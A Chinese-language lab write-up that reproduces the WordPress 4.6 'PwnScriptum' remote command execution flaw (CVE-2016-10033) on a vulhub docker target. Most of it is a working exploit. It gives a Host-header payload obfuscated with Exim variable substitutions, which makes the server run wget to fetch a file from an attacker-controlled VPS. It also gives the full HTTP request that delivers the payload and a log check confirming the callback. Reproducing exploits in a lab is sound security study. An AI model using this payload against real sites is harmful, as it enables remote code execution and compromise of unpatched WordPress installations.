【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033)

一、启动靶机

docker-compose build
docker-compose up -d

访问URL进行install:

http://192.168.150.146:8080

二、生成payload

前提:命令中
空格 用 ${substr{10}{1}{$tod_log}}代替
/ 用 ${substr{0}{1}{$spool_directory}}代替

命令:

/usr/bin/wget --output-document /tmp/rce vps_ip/hacker

payload:

aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/rce vps_ip/hacker}} null)

最后payload:

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}VPS_IP${substr{0}{1}{$spool_directory}}hacker}} null)

三、发送payload

URL:

http://192.168.150.146:8080/wp-login.php?action=lostpassword

在这里插入图片描述
在这里插入图片描述
将payload替换host请求头

请求:

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}VPS_IP${substr{0}{1}{$spool_directory}}hacker}} null)
Content-Length: 85
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.150.146:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.150.146:8080/wp-login.php?action=lostpassword
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close

user_login=admin&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

send
在这里插入图片描述

四、检验

在VPS上的apache日志有靶机的请求记录。

tail -n 1 -f /var/log/apache2/access.log

在这里插入图片描述
注意:
远程 URL 中不能有 http://
所有字母必须小写

参考:

https://www.cnblogs.com/ssooking/p/8893264.html


版权声明:本文为weixin_42884199原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。